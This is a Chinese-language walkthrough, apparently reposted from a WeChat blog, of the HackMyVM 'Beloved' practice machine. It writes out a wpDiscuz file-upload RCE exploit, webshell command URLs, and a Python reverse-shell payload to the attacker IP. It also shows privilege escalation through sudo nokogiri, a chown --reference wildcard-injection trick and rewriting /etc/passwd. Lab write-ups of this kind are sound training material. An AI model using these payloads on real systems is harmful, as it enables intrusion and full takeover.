渗透测试靶机练习No. 86 Beloved

admin 2022年5月3日00:37:56评论57 views字数 2260阅读7分32秒阅读模式

渗透测试靶机练习No. 86 Beloved

靶机信息

下载地址:

https://hackmyvm.eu/machines/machine.php?vm=Beloved
网盘链接:https://pan.baidu.com/s/1OjMwuU6F1V98x2UnLz-eHA?pwd=xcvx

靶场: HackMyVm.eu

靶机名称: Beloved

难度: 简单

发布时间: 2021年6月29日

提示信息:

目标: user.txt和root.txt


实验环境

攻击机:VMware kali 10.0.0.3 eth0桥接互联网,eth1桥接vbox-Host-Only

靶机:Vbox linux IP自动获取 网卡host-Only


信息收集

扫描主机

扫描局域网内的靶机IP地址

ping -ag 10.0.0.0/24 2>/dev/null

渗透测试靶机练习No. 86 Beloved

扫描到主机地址为10.0.0.155

扫描端口

扫描靶机开放的服务端口

sudo nmap -sC -sV -p- 10.0.0.155 -oN nmap.log

渗透测试靶机练习No. 86 Beloved

扫描到22和80端口开放,先来看看80端口

Web渗透

渗透测试靶机练习No. 86 Beloved

渗透测试靶机练习No. 86 Beloved

访问后发现是wordpress程序,源码中发现需要绑定域名

绑定域名

vi /etc/hosts

渗透测试靶机练习No. 86 Beloved

绑定后使用wpscan扫描wordpress程序漏洞

WordPress漏洞利用

wpscan --url http://beloved --api-token F0y3fug9G1J53tJH5q1QovCO8g7pp7WA0XBB99s7eds --plugins-detection aggressive

渗透测试靶机练习No. 86 Beloved

找到个文件上传漏洞,搜索下exp

searchsploit wpDiscuz

渗透测试靶机练习No. 86 Beloved

还可以远程代码执行,验证一下

searchsploit -m 49967
python3 49967.py -u http://10.0.0.155 -p /2021/06/09/hello-world

渗透测试靶机练习No. 86 Beloved

命令执行失败,但是还有webshell地址在,来试试能否利用

http://beloved/wp-content/uploads/2022/04/seuygydldrdmdpw-1651337461.0428.php?cmd=id

渗透测试靶机练习No. 86 Beloved

可以执行命令,试试反弹shell

1。攻击机监听4444端口

nc -lvvp 4444

渗透测试靶机练习No. 86 Beloved

2。执行反弹payload

http://beloved/wp-content/uploads/2022/04/seuygydldrdmdpw-1651337461.0428.php?cmd=python3 -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.0.0.3",4444));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/bash","-i"]);'

渗透测试靶机练习No. 86 Beloved

反弹成功,来找找敏感信息

cd /var/www
ls -al

渗透测试靶机练习No. 86 Beloved

在/var/www目录下找到.bash_history文件,查看一下内容

cat .bash_history

渗透测试靶机练习No. 86 Beloved

发现一条命令是以beloved用户身份执行的,看起来像是sudo提权,来看看哪些程序不需要密码访问

sudo -l

渗透测试靶机练习No. 86 Beloved

果然可以用beloved用户身份执行nokogiri,来看看这是个什么程序

sudo -u beloved /usr/local/bin/nokogiri --help
sudo -u beloved /usr/local/bin/nokogiri /etc/passwd

渗透测试靶机练习No. 86 Beloved

system '/bin/bash'

渗透测试靶机练习No. 86 Beloved

拿到beloved权限,继续查找可提权的信息

cd ~
ls -al
cat user.txt

渗透测试靶机练习No. 86 Beloved

拿到user.txt,发现.bash_history来查看下内容

cat .bash_history

渗透测试靶机练习No. 86 Beloved

看上去/opt目录下有个id_rsa文件可以登录root用户,验证下

cd /opt
ssh -i id_rsa root@localhost

渗透测试靶机练习No. 86 Beloved

还需要密码,上传个pspy64检查一下定时执行的任务

1。攻击机在pspy64目录下开启HTTP服务

python3 -m http.server

渗透测试靶机练习No. 86 Beloved

2。靶机下载pspy64,并运行

cd /tmp
wget http://10.0.0.3:8000/pspy64
chmod +x pspy64
./pspy64

渗透测试靶机练习No. 86 Beloved

渗透测试靶机练习No. 86 Beloved

发现root用户在后台每分钟执行一次chown rot:root *,我们可以利用chown的--reference参数将文件的权限复制给另一个文件,验证一下

cd /opt
touch reference
touch -- --reference=reference
ln -s /etc/passwd

渗透测试靶机练习No. 86 Beloved

简单解释下:

因为chown root:root后面这个*,让后台程序运行起来变成 chown root:root --reference=reference id_rsa passwd,此时--reference文件变成了参数。

等待1分钟然后查看/etc/passwd文件权限

ls -al /etc/passwd

渗透测试靶机练习No. 86 Beloved

权限复制成功,接下来生成一个密码,再将密码替换/etc/passwd文件中root用户信息中的第1个x

openssl passwd -1 123123
vi /etc/passwd

渗透测试靶机练习No. 86 Beloved

OK替换成功,切换到root用户

su

渗透测试靶机练习No. 86 Beloved

查找flag

cat /root/root.txt

渗透测试靶机练习No. 86 Beloved


拿到root.txt,游戏结束。

渗透测试靶机练习No. 86 Beloved

渗透测试靶机练习No. 86 Beloved

原文始发于微信公众号(伏波路上学安全):渗透测试靶机练习No. 86 Beloved

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2022年5月3日00:37:56
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   渗透测试靶机练习No. 86 Belovedhttp://cn-sec.com/archives/967025.html

发表评论

匿名网友 填写信息